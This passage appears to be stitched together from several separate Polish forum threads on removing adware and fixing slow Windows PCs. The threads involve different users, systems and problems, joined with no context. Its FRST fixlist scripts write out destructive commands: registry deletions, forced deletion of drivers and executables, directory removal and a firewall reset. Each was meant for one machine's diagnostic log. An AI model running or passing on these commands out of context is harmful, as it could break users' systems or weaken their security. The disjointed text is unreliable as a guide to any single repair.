C:\Documents and Settings\All Users\Application Data\MediaArt
C:\Documents and Settings\All Users\Application Data\MumboJumbo
C:\Documents and Settings\All Users\Application Data\NCH Software
C:\Documents and Settings\All Users\Application Data\Norton
C:\Documents and Settings\All Users\Application Data\NortonInstaller
C:\Documents and Settings\All Users\Application Data\OpenFM
C:\Documents and Settings\All Users\Application Data\Oberon Media
C:\Documents and Settings\All Users\Application Data\Odian
C:\Documents and Settings\All Users\Application Data\Orchid Games
C:\Documents and Settings\All Users\Application Data\PITy
C:\Documents and Settings\All Users\Application Data\PlayFirst
C:\Documents and Settings\All Users\Application Data\PlayPond
C:\Documents and Settings\All Users\Application Data\Playrix Entertainment
C:\Documents and Settings\All Users\Application Data\regid.1986-12.com.adobe
C:\Documents and Settings\All Users\Application Data\rionix
C:\Documents and Settings\All Users\Application Data\ScreenVCR
C:\Documents and Settings\All Users\Application Data\ShopperPro
C:\Documents and Settings\All Users\Application Data\Skype Extras
C:\Documents and Settings\All Users\Application Data\SpecialBit
C:\Documents and Settings\All Users\Application Data\SulusGames
C:\Documents and Settings\All Users\Application Data\Sun
C:\Documents and Settings\All Users\Application Data\Tencent
C:\Documents and Settings\All Users\Application Data\TaxMachine
C:\Documents and Settings\All Users\Application Data\Top Evidence
C:\Documents and Settings\Krzysztof\Application Data\Adobe GIF Format CS5 Prefs
C:\Documents and Settings\Krzysztof\Application Data\Adobe PNG Format CS5 Prefs
C:\Documents and Settings\Krzysztof\Application Data\Sys2662.Config.Repository.bin
C:\Documents and Settings\Krzysztof\Application Data\.mono
C:\Documents and Settings\Krzysztof\Application Data\11732
C:\Documents and Settings\Krzysztof\Application Data\2monkeys
C:\Documents and Settings\Krzysztof\Application Data\A2 Entertainment
C:\Documents and Settings\Krzysztof\Application Data\Alawar Entertainment
C:\Documents and Settings\Krzysztof\Application Data\AlawarEntertainment
C:\Documents and Settings\Krzysztof\Application Data\aliasworlds
C:\Documents and Settings\Krzysztof\Application Data\ArcSoft
C:\Documents and Settings\Krzysztof\Application Data\Artifex Mundi
C:\Documents and Settings\Krzysztof\Application Data\Artogon
C:\Documents and Settings\Krzysztof\Application Data\Ashampoo
C:\Documents and Settings\Krzysztof\Application Data\Autodesk
C:\Documents and Settings\Krzysztof\Application Data\Awem
C:\Documents and Settings\Krzysztof\Application Data\BlamGames
C:\Documents and Settings\Krzysztof\Application Data\BlueLabsSoftware
C:\Documents and Settings\Krzysztof\Application Data\CallingID
C:\Documents and Settings\Krzysztof\Application Data\casualArts
C:\Documents and Settings\Krzysztof\Application Data\com.adobe.downloadassistant.AdobeDownloadAssistant
C:\Documents and Settings\Krzysztof\Application Data\Corel
C:\Documents and Settings\Krzysztof\Application Data\DailyMagic
C:\Documents and Settings\Krzysztof\Application Data\Dark Blue Games
C:\Documents and Settings\Krzysztof\Application Data\DarkManor
C:\Documents and Settings\Krzysztof\Application Data\Desktop Apps
C:\Documents and Settings\Krzysztof\Application Data\Devart
C:\Documents and Settings\Krzysztof\Application Data\DominiGames
C:\Documents and Settings\Krzysztof\Application Data\DonationCoder
C:\Documents and Settings\Krzysztof\Application Data\e-Deklaracje
C:\Documents and Settings\Krzysztof\Application Data\e-Deklaracje.A1909296681C7ACEFE45687D3A64758C8659BF46.1
C:\Documents and Settings\Krzysztof\Application Data\Eipix
C:\Documents and Settings\Krzysztof\Application Data\Elephant Games
C:\Documents and Settings\Krzysztof\Application Data\Enlightenus2SE_BFG
C:\Documents and Settings\Krzysztof\Application Data\EntwinedSoD
C:\Documents and Settings\Krzysztof\Application Data\ERS Game Studios
C:\Documents and Settings\Krzysztof\Application Data\FabrykaGier
C:\Documents and Settings\Krzysztof\Application Data\FabrykaGierNew
C:\Documents and Settings\Krzysztof\Application Data\FarmerJane
C:\Documents and Settings\Krzysztof\Application Data\FlowerOfImmortality
C:\Documents and Settings\Krzysztof\Application Data\FlyWheelGames
C:\Documents and Settings\Krzysztof\Application Data\FreeHideIP
C:\Documents and Settings\Krzysztof\Application Data\Freeze Tag
C:\Documents and Settings\Krzysztof\Application Data\Friday's games
C:\Documents and Settings\Krzysztof\Application Data\Funswitch
C:\Documents and Settings\Krzysztof\Application Data\Fuzzy Bug Interactive
C:\Documents and Settings\Krzysztof\Application Data\GameInvest
C:\Documents and Settings\Krzysztof\Application Data\GameMill Entertainment
C:\Documents and Settings\Krzysztof\Application Data\GHISLER
C:\Documents and Settings\Krzysztof\Application Data\Ghost Ship Studios
C:\Documents and Settings\Krzysztof\Application Data\GlarySoft
C:\Documents and Settings\Krzysztof\Application Data\gtk-2.0
C:\Documents and Settings\Krzysztof\Application Data\Happy Chef
C:\Documents and Settings\Krzysztof\Application Data\HdO Adventure
C:\Documents and Settings\Krzysztof\Application Data\Hidden Objects Romance
C:\Documents and Settings\Krzysztof\Application Data\HitPoint Studios
C:\Documents and Settings\Krzysztof\Application Data\Kestrel
C:\Documents and Settings\Krzysztof\Application Data\Lazy Turtle Games
C:\Documents and Settings\Krzysztof\Application Data\Leadertech
C:\Documents and Settings\Krzysztof\Application Data\Legacy Games
C:\Documents and Settings\Krzysztof\Application Data\LegacyInteractive
C:\Documents and Settings\Krzysztof\Application Data\LittleGamesCompany
C:\Documents and Settings\Krzysztof\Application Data\Loop Terminarz
C:\Documents and Settings\Krzysztof\Application Data\MagicIndie
C:\Documents and Settings\Krzysztof\Application Data\Malwarebytes
C:\Documents and Settings\Krzysztof\Application Data\Mariaglorum
C:\Documents and Settings\Krzysztof\Application Data\Maximize Games
C:\Documents and Settings\Krzysztof\Application Data\MediaArt
C:\Documents and Settings\Krzysztof\Application Data\ModelViews
C:\Documents and Settings\Krzysztof\Application Data\Monkey Barrel Games
C:\Documents and Settings\Krzysztof\Application Data\MumboJumbo
C:\Documents and Settings\Krzysztof\Application Data\MySQL-Front
C:\Documents and Settings\Krzysztof\Application Data\MysteriousCaseOfJekyllAndHyde
C:\Documents and Settings\Krzysztof\Application Data\Namco
C:\Documents and Settings\Krzysztof\Application Data\NCH Software
C:\Documents and Settings\Krzysztof\Application Data\New Version Available
C:\Documents and Settings\Krzysztof\Application Data\npm
C:\Documents and Settings\Krzysztof\Application Data\npm-cache
C:\Documents and Settings\Krzysztof\Application Data\Oberon Media
C:\Documents and Settings\Krzysztof\Application Data\Odian Games
C:\Documents and Settings\Krzysztof\Application Data\OpenCube Inc
C:\Documents and Settings\Krzysztof\Application Data\OpenFM
C:\Documents and Settings\Krzysztof\Application Data\Opera
C:\Documents and Settings\Krzysztof\Application Data\Opera Software
C:\Documents and Settings\Krzysztof\Application Data\Oracle
C:\Documents and Settings\Krzysztof\Application Data\Orneon
C:\Documents and Settings\Krzysztof\Application Data\Phantasmat_bf_se1
C:\Documents and Settings\Krzysztof\Application Data\PlataGames
C:\Documents and Settings\Krzysztof\Application Data\PlayFavoriteGames
C:\Documents and Settings\Krzysztof\Application Data\PlayFirst
C:\Documents and Settings\Krzysztof\Application Data\PlayPond
C:\Documents and Settings\Krzysztof\Application Data\Playrix Entertainment
C:\Documents and Settings\Krzysztof\Application Data\PSpad
C:\Documents and Settings\Krzysztof\Application Data\PuzzleLab
C:\Documents and Settings\Krzysztof\Application Data\Realore
C:\Documents and Settings\Krzysztof\Application Data\RealWorld
C:\Documents and Settings\Krzysztof\Application Data\ShamanGS
C:\Documents and Settings\Krzysztof\Application Data\Silverback Productions
C:\Documents and Settings\Krzysztof\Application Data\SmartDraw
C:\Documents and Settings\Krzysztof\Application Data\SMIGames
C:\Documents and Settings\Krzysztof\Application Data\Specialbit
C:\Documents and Settings\Krzysztof\Application Data\Star-Tools
C:\Documents and Settings\Krzysztof\Application Data\Subversion
C:\Documents and Settings\Krzysztof\Application Data\SulusGames
C:\Documents and Settings\Krzysztof\Application Data\Sun
C:\Documents and Settings\Krzysztof\Application Data\SunRay Games
C:\Documents and Settings\Krzysztof\Application Data\SunwardGames
C:\Documents and Settings\Krzysztof\Application Data\sweet-page
C:\Documents and Settings\Krzysztof\Application Data\tabagames
C:\Documents and Settings\Krzysztof\Application Data\Talkback
C:\Documents and Settings\Krzysztof\Application Data\TeamViewer
C:\Documents and Settings\Krzysztof\Application Data\Tencent
C:\Documents and Settings\Krzysztof\Application Data\Teyon
C:\Documents and Settings\Krzysztof\Application Data\TikisLab
C:\Documents and Settings\Krzysztof\Application Data\Top Evidence
C:\Documents and Settings\Krzysztof\Application Data\TortoiseSVN
C:\Documents and Settings\Krzysztof\Application Data\Unity
C:\Documents and Settings\Krzysztof\Application Data\Vast Studios
C:\Documents and Settings\Krzysztof\Application Data\Vogat Interactive
C:\Documents and Settings\Krzysztof\Application Data\WinRAR
C:\Documents and Settings\Krzysztof\Application Data\World-LooM
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\DonationCoder_ScreenshotCaptor_InstallInfo.dat
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\{32A3A4F2-B792-11D6-A78A-00B0D0150120}
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\5C8CAC0A-1443301797-5799-9460-C2325843CB2C
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Amazon
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\ArcSoft
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Autodesk
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\avgchrome
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\cache
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Color-Brush
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\CrashRpt
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Farmington Tales
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Game Mill Files
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\gmsd_pl_005010096
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Google\Chrome\User Data\Default
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Installer
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\KaDonk
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Kookos
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Namco
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Oberon Games
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\OpenCube Inc
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Opera
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Opera Software
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Qurb4
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Sun
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\TechSmith
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Temp
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\TortoiseSVN
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\TSVNCache
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Unity
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\webkit
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\WMTools Downloaded Files
C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Xenocode
C:\extensions
C:\Program Files\20717d47-27d3-4fd5-849d-70bab7fdb68a
C:\Program Files\aeafcc87-810f-4dcb-a286-bd94d8f90ac3
C:\Program Files\Atlassian
C:\Program Files\Autodesk
C:\Program Files\c620fa05-8fd3-422d-8b48-6fb2e023fb34
C:\Program Files\c6fdae68-5b2b-49d1-904d-708dc40b305a
C:\Program Files\CasualGameBox
C:\Program Files\de2a3e96-eab7-4ac0-815d-d28e00b7f723
C:\Program Files\f9138745-f797-4a7e-98f2-acd48c761d2f
C:\Program Files\Feed Notifier
C:\Program Files\gmsd_pl_005010096
C:\Program Files\ICTV
C:\Program Files\Java
C:\Program Files\jv16 PowerTools 2011
C:\Program Files\mbot_pl_014010096
C:\Program Files\Mioplanet
C:\Program Files\Motorola
C:\Program Files\NCH Software
C:\Program Files\Norton Security Scan
C:\Program Files\NortonInstaller
C:\Program Files\NotePage
C:\Program Files\Opera
C:\Program Files\PDFCreator
C:\Program Files\PITy
C:\Program Files\PFConfig
C:\Program Files\predm
C:\Program Files\QuickTime
C:\Program Files\RealArcade
C:\Program Files\Common Files\Adobe-BackupByPhotoshopPortable
C:\Program Files\Common Files\AVSMedia
C:\Program Files\Common Files\McAfee
C:\Program Files\Common Files\Oberon Media
C:\Program Files\Common Files\SWiSHzone.com
Hosts:

Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie będzie restartu. Powstanie kolejny fixlog.txt. Przedstaw go.

2. Uruchom FRST, w polu Szukaj (Search) wklej co poniżej i klik w Szukaj w rejestrze (Search Registry). Przedstaw wynikowy log.

Tencent;QQPCMgr

3. Uruchom AdwCleaner. Wybierz opcję Skanuj (na razie nic nie usuwaj) i dostarcz wynikowy log z folderu C:\AdwCleaner.

Z Fixami FRST już skończyliśmy. Zastosuj DelFix i wyczyść foldery Przywracania systemu: KLIK.

Inny problem jaki się pojawił to to, że po zainstalowaniu avast free antivirus komputer zaczął mulić, programy otwierają się wolniej sam FRST robił się o wiele dłużej i było widać na nim lagi, momentami nawet komputer się przywiesza.

Jeśli ten efekt jest trwały, tzn. widoczny także po kolejnym restarcie, to już chyba nic w tej kwestii nie zdziałam.

- Albo Avast + MBAM + Unchecky to za dużo i redukcja pozostałych do sprawdzenia.

- Albo Avast "nie gra" z tą szczególną konfiguracją i trzeba szukać innego antywirusa... Mógłbyś zrezygnować w ogóle z instalacji zewnętrznych i ograniczyć się do tego co oferuje sam system, tzn. wbudowany Windows Defender.

Jedna rzecz o której zapomniałem napisać to to że podczas włączenia sie komputera trwa to dość długo bo po przejściu biosa i programu revocery pojawia się czarny ekran z logiem okienkami windowsa i kółeczkiem które pokazuje ładowanie się po tym pojawia się czarny ekran jest on dość długo i pare sekund przed jego zniknięciem słychać dźwięk logowania się do systemu po czym pojawia się niebieski ekran z kółkiem postępu i dopiero po paru sekundach przechodzi do logowani się do użytkownika co też trwa parę sekund po przejściu do pulpitu zanim wszystkie programy się uruchomią znów mija jakiś czas.

Spróbuj czy pomoże coś ta procedura: KLIK.

Od pewnego czasu komputer uruchamia się nieco dłużej.

 

Po uruchomieniu komputera pojawia się normalnie animowane logo Windows 7, a potem mam czarny ekran z wydocznym jedynie kursorem myszki po środku i nie można nią ruszać. Dopiero po około 30 sekundach pojawia się niebieski ekran powitalny Windows 7 - Zapraszamy.

W Dzienniku zdarzeń powtarza się błąd związany ze zbyt długą odpowiedzią usługi Emsisoft Anti-Malware, co pasuje do powyższego objawu:

Dziennik System:

=============

Error: (10/29/2015 07:50:44 PM) (Source: Service Control Manager) (EventID: 7000) (User: )

Description: Nie można uruchomić usługi Emsisoft Anti-Malware 8.0 - Service z powodu następującego błędu:

%%1053
 

Error: (10/29/2015 07:50:44 PM) (Source: Service Control Manager) (EventID: 7009) (User: )

Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na połączenie się z usługą Emsisoft Anti-Malware 8.0 - Service.

Usługa jest ustawiona na Automatycznym, lecz jak widać jest jakiś problem by ją uruchomić:

S2 a2AntiMalware; C:\Program Files (x86)\Emsisoft Anti-Malware\a2service.exe [7084784 2015-10-01] (Emsisoft Ltd)

Tak więc rozpocznij od deinstalacji w/w programu.

PS. W spoilerze kosmetyka, tzn. usunięcie wpisów pustych. Bez znaczenia dla poprawy działania systemu.

CloseProcesses:
CreateRestorePoint:
HKLM-x32\...\Run: [] => [X]
S3 ewusbnet; system32\DRIVERS\ewusbnet.sys [X]
S3 ew_hwusbdev; system32\DRIVERS\ew_hwusbdev.sys [X]
S3 huawei_enumerator; system32\DRIVERS\ew_jubusenum.sys [X]
S3 hwdatacard; system32\DRIVERS\ewusbmdm.sys [X]
BHO-x32: Brak nazwy -> {8664889D-ED18-4713-918F-E2BB69D8452B} -> Brak pliku
BHO-x32: Brak nazwy -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> Brak pliku
Toolbar: HKLM-x32 - Brak nazwy - {8664889D-ED18-4713-918F-E2BB69D8452B} - Brak pliku
FF Extension: Brak nazwy - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2015-10-08] [brak podpisu cyfrowego]
CHR HKU\S-1-5-21-2764150225-4038215503-3776723038-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx
Task: {0E17E1CB-3301-4F6A-93C2-BC97EB618E73} - System32\Tasks\{54C7D3D8-CB51-497A-A94E-89E31BE389EF} => pcalua.exe -a "C:\Program Files\AVAST Software\Avast\aswRunDll.exe" -c "C:\Program Files\AVAST Software\Avast\Setup\setiface.dll" RunSetup
Task: {B0DE4475-E05C-48B7-BF1C-13C5A551CAEE} - System32\Tasks\{3CFD31FF-B0EC-4832-B8A9-3738059EF363} => C:\Program Files (x86)\Rovio\Angry Birds Seasons\AngryBirdsSeasonsFull.exe
AlternateDataStreams: C:\Windows\win.ini:WINDOWS
AlternateDataStreams: C:\Windows\system32\desktop.ini:WIN64
AlternateDataStreams: C:\ProgramData\Ytsix2.theme:NTOSCHK
C:\Users\user\Favorites\GG dysk.lnk
C:\Users\user\Desktop\programy i gry\Maurus Driver Setting.lnk
Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f
Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\BingSvc" /f
Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f
Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f
Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f
EmptyTemp:

Temat przesuwam do działu Windows. W raportach nie widać żadnych oznak czynnej infekcji...

Mój problem polega na tym, że mam częste, kilkusekundowe freezy, a komputer działą bardzo wolno.

Z raportów nic nie wynika. Sugestie:

1. No cóż, główny podejrzany o najbardziej rozbudowanym układzie startowym to Panda. Na próbę odinstaluj, by sprawdzić czy to polepszy sytuację.

2. Dziennik CodeIntegrity zgłasza następującą rzecz:

CodeIntegrity:

===================================

Date: 2015-10-28 17:13:52.760

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\dsound.dll because the set of per-page image hashes could not be found on the system.

Start > w polu szukania wpisz cmd > z prawokliku Uruchom jako Administrator > wklej komendę i ENTER:

sfc /scannow

Gdy komenda ukończy działanie, w cmd wklej kolejną:

findstr /c:"[sR]" %windir%\logs\cbs\cbs.log >sfc.txt & start notepad sfc.txt

Wynikowy log dołącz tutaj.

3. W Dzienniku zdarzeń powtarza się błąd gry Steam powodowany przez moduł sterowników nVidia. Trudno ocenić skalę tego problemu.

Error: (10/28/2015 07:40:43 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Nazwa aplikacji powodującej błąd: Terraria.exe, wersja: 1.3.0.7, sygnatura czasowa: 0x55c8fafb

Nazwa modułu powodującego błąd: nvd3d9wrap.dll, wersja: 9.18.13.5306, sygnatura czasowa: 0x55668111

Kod wyjątku: 0xc00000fd

Przesunięcie błędu: 0x000031b1

Identyfikator procesu powodującego błąd: 0x1b60

Godzina uruchomienia aplikacji powodującej błąd: 0xTerraria.exe0

Ścieżka aplikacji powodującej błąd: Terraria.exe1

Ścieżka modułu powodującego błąd: Terraria.exe2

Identyfikator raportu: Terraria.exe3

Ponadto jest jakiś problem z ładowaniem jednego ze sterowników VirtualBox:

System errors:

=============

Error: (10/28/2015 10:10:14 PM) (Source: Service Control Manager) (EventID: 7026) (User: )

Description: Nie można załadować następujących sterowników startu rozruchowego lub systemowego:

VBoxDrv

PS. I czas zaktualizować systemowy Internet Explorer, nawet jeśli z niego nie korzystasz. Strasznie stara wersja IE8.

Alcohol odinstalowany, sterownik też, jednak kluczu rejestru nie dało się w żaden sposób usunąć.

Tym się zajmie skrypt FRST ze spoilera. Skrypt zaadresuje też mini szczątki adware i różne puste wpisy. Bez znaczenia dla stanu systemu.

CloseProcesses:
CreateRestorePoint:
S3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2015-06-02] (Disc Soft Ltd)
S4 sptd; \SystemRoot\System32\Drivers\sptd.sys [X]
S3 VBoxNetFlt; system32\DRIVERS\VBoxNetFlt.sys [X]
S3 vmci; \SystemRoot\system32\DRIVERS\vmci.sys [X]
S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X]
GroupPolicyScripts\User: Restriction 
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
C:\Program Files (x86)\Alcohol Soft
C:\ProgramData\Microsoft\Windows\Start Menu.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Smart File Advisor
C:\Windows\System32\DRIVERS\dtlitescsibus.sys
Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /f
Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /f
Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\services\StarWindServiceAE" /f
Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\AirDroid 3" /f
Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\AlcoholAutomount" /f
Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Dolby Home Theater v4" /f
Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\EPLTarget" /f
Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\KiesTrayAgent" /f
Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\OneDrive" /f
Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SFAUpdater" /f
Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Smart File Advisor" /f
Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Spotify Web Helper" /f
Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f
Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f
Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f
CMD: netsh advfirewall reset
EmptyTemp:

Niestety narzędzie deinstalacyjne ESET wymaga Trybu awaryjnego. W związku z tym modyfikacja instrukcji. Opuść punkt 1, a w punkcie 2 zastosuj zmodyfikowany skrypt uwzględniający sterowniki ESET:

S1 EpfwLWF; C:\Windows\system32\DRIVERS\EpfwLWF.sys [44632 2015-02-23] (ESET)
S3 ESETCleanersDriver; C:\Windows\system32\Drivers\ESETCleanersDriver.sys [170280 2015-07-07] (ESET)
HKLM-x32\...\Run: [Malwarebytes Anti-Exploit] => C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae.exe
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
S3 MFE_RR; \??\C:\USERS\WOJTUQ\APPDATA\LOCAL\TEMP\mfe_rr.sys [X]
RemoveDirectory: C:\FRST\Quarantine
RemoveDirectory: C:\KVRT_Data
RemoveDirectory: C:\Program Files\ESET
RemoveDirectory: C:\Program Files\Java
RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
RemoveDirectory: C:\Users\wojtuq\Doctor Web
RemoveDirectory: C:\Users\wojtuq\Desktop\FRST-OlderVersion
RemoveDirectory: C:\WINDOWS\System32\Tasks\Safer-Networking
RemoveDirectory: C:\zoek_backup
CMD: del /q C:\Users\wojtuq\Desktop\KVRT.exe
CMD: del /q C:\Users\wojtuq\Desktop\launch.exe
CMD: del /q C:\Users\wojtuq\Desktop\zoek.exe
CMD: del /q C:\Users\wojtuq\Desktop\zoek-results.txt
CMD: del /q C:\Windows\system32\Drivers\EpfwLWF.sys
CMD: del /q C:\Windows\system32\Drivers\ESETCleanersDriver.sys
CMD: del /q C:\zoek-results.log
Hosts:
Reboot:

W związku z tym należy się zabrać za usuwanie ręczne wszystkiego. Przeprowadź następujące operacje:

1. W międzyczasie doinstalował się kolejny śmieć Xmas i to spróbuj odinstalować, niezależnie czy będzie błąd kontynuuj akcje. Poza tym, nadal do deinstalacji stara wersja Java 7 Update 55.

2. Otwórz Notatnik i wklej w nim:

CloseProcesses:
R2 aroductpeo; C:\Documents and Settings\Krzysztof\Local Settings\Application Data\Planetjob.exe [46592 2015-10-29] () [File not signed]
R2 Concom; C:\Program Files\Concom\Concom.exe [379904 2015-10-25] () [File not signed] 
S2 globalUpdate; C:\Program Files\globalUpdate\Update\globalupdate.exe [68608 2015-10-29] (globalUpdate) [File not signed] 
S3 globalUpdatem; C:\Program Files\globalUpdate\Update\globalupdate.exe [68608 2015-10-29] (globalUpdate) [File not signed] 
R1 QMIEProtect; C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QMIEProtect.sys [49976 2015-08-18] ()
R2 QQPCRTP; C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QQPCRTP.exe [301728 2015-09-15] (Tencent)
R2 QQSysMon; C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QQSysMon.sys [108472 2015-09-26] (电脑管家)
R2 SSFK; C:\Program Files\SFK\SSFK.exe [458400 2015-09-26] (TODO: )
S3 TAOAccelerator; C:\WINDOWS\system32\Drivers\TAOAccelerator.sys [114520 2000-12-31] (Tencent)
S3 TAOFrame; C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\TAOFrame.exe [293856 2015-09-26] (Tencent)
R1 TAOKernelDriver; C:\WINDOWS\System32\Drivers\TAOKernelXP.sys [139064 2015-09-26] (Tencent Technology(Shenzhen) Company Limited)
R3 TFsFlt; C:\WINDOWS\System32\Drivers\TFsFlt.sys [150072 2015-09-26] (电脑管家)
R1 TSCPM; C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\tscpm.sys [43448 2015-09-26] (电脑管家)
R1 TSDefenseBt; C:\WINDOWS\System32\DRIVERS\TSDefenseBt.sys [14008 2015-09-26] (Tencent)
R0 TsFltMgr; C:\WINDOWS\System32\drivers\TsFltMgr.sys [124792 2015-09-26] (电脑管家)
R1 TSKSP; C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\TSKsp.sys [204920 2015-09-26] (电脑管家)
S3 TSSK; C:\WINDOWS\System32\tssk.sys [67896 2015-09-26] (电脑管家)
R1 TSSysKit; C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\TSSysKit.sys [101560 2015-09-26] (电脑管家)
R2 WdsManPro; C:\Documents and Settings\All Users\Application Data\2WdsManPro2\WdsManPro.exe [442504 2015-09-26] (DTools LIMITED)
S1 ppfd_vt_1_10_0_24; system32\drivers\ppfd_vt_1_10_0_24.sys [X]
S1 wwfd_vt_1_10_0_24; system32\drivers\wwfd_vt_1_10_0_24.sys [X]
Task: C:\WINDOWS\Tasks\469fcbcc-315d-4dd5-9804-212abb2e3cb9-1-6.job => C:\Program Files\GoHD\469fcbcc-315d-4dd5-9804-212abb2e3cb9-1-6.exe 
Task: C:\WINDOWS\Tasks\50278e6d-151b-4cf5-9e8d-31ed23fbc614-1-6.job => C:\Program Files\CinemaPlus-3.2cV26.09\50278e6d-151b-4cf5-9e8d-31ed23fbc614-1-6.exe 
Task: C:\WINDOWS\Tasks\50278e6d-151b-4cf5-9e8d-31ed23fbc614-10_user.job => C:\Program Files\CinemaPlus-3.2cV26.09\50278e6d-151b-4cf5-9e8d-31ed23fbc614-10.exe 
Task: C:\WINDOWS\Tasks\50278e6d-151b-4cf5-9e8d-31ed23fbc614-3.job => C:\Program Files\CinemaPlus-3.2cV26.09\50278e6d-151b-4cf5-9e8d-31ed23fbc614-3.exe 
Task: C:\WINDOWS\Tasks\50278e6d-151b-4cf5-9e8d-31ed23fbc614-5.job => C:\Program Files\CinemaPlus-3.2cV26.09\50278e6d-151b-4cf5-9e8d-31ed23fbc614-5.exe 
Task: C:\WINDOWS\Tasks\50278e6d-151b-4cf5-9e8d-31ed23fbc614-6.job => C:\Program Files\CinemaPlus-3.2cV26.09\50278e6d-151b-4cf5-9e8d-31ed23fbc614-6.exe 
Task: C:\WINDOWS\Tasks\50278e6d-151b-4cf5-9e8d-31ed23fbc614-7.job => C:\Program Files\CinemaPlus-3.2cV26.09\50278e6d-151b-4cf5-9e8d-31ed23fbc614-7.exe 
Task: C:\WINDOWS\Tasks\6d0ac05c-4429-4e4d-bcea-abd79f29b20e-1-6.job => C:\Program Files\CinemaP-1.9cV26.09\6d0ac05c-4429-4e4d-bcea-abd79f29b20e-1-6.exe 
Task: C:\WINDOWS\Tasks\7ac4ca75-d021-44c5-ba78-4c00550bafe6-1-6.job => C:\Program Files\Object Browser\7ac4ca75-d021-44c5-ba78-4c00550bafe6-1-6.exe 
